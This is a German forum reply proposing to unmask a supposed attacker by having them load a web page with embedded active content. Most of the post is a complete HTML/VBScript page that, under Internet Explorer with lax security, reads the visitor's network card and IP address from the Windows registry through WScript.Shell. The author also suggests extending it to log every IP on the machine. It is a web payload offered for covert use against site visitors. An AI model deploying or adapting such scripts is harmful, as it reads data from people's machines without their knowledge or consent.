Sup!
Du baust aktive Inhalte ein, die beim Aufruf der Seite Verbindung mit Deinem Server aufnehmen und den "Angreifer" so verraten.
Mit etwas Glück benutzt der Angreifer den IE und lasche Sicherheitseinstellungen - dann kannst Du ggf. das folgende Skript einbauen:
<html>
<head>
<title>test</title>
<script language="VBScript">
<!--
Function GetIPAddress
' This function retrieves the IP Address from the registry
' It gets it from the CurrentControlSet, so even when using DHCP
' it returns the correct IP Address
' Declare variables
Dim key
Dim cTempIPAddress
Dim cIPAddress
dim cIPAddressKey
Set oSh = CreateObject("WScript.Shell")
cInterfacesKey="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP\Parameters\Interfaces"
cNICSearch="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\4\ServiceName"
' First check which network card to use
cNicServiceName=oSh.RegRead(cNICSearch)
' Now read the IP Address from that card
cIPAddressKey=cInterfaceskey + cNicServiceName+"\IPAddress"
cTempIPAddress=oSh.RegRead (cIPAddresskey)
' Split the items in the var tempIPAddress to the octets in array IPAddress
cIPAddress=split (cTempIPAddress(0),".",4)
' the IP addresss is now readable from ipaddress
' for example, to read the first octet, use: FirstOctet=IPAddress(0)
GetIPAddress=cIPAddress
End Function
-->
</script>
<script language="JScript">
<!--
function VBArrayTaker(vbarray){
var a = new VBArray(vbarray);
var b = a.toArray();
var i;
var text = "";
for (i = 0; i < 4; i++)
{
text = text + b[i] + ".";
}
document.getElementById("ausgabe").value=text;
}
-->
</script>
</head>
<body>
<input type="text" name="ausgabe" value="NULL">
TESTSEITE
<h2>TEST</h2>
<script language="JScript">
<!--
VBArrayTaker(GetIPAddress());
-->
</script>
</body>
</html>
Der Wert "4" in Zeile
cNICSearch="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\4\ServiceName"
ist geraten und möglicherweise eher 1 - nur bei mir war es zufällig 4. Mit etwas VBScript-Kenntnissen müsste man das Skript so aufbohren können, dass es alle Möglichkeiten durchgeht und alle vergebenen IPs der Maschine aufzeichnet.
Halali - Fröhliche Hacker-Jagd.
Gruesse,
Bio
--
Never give up, never surrender!!!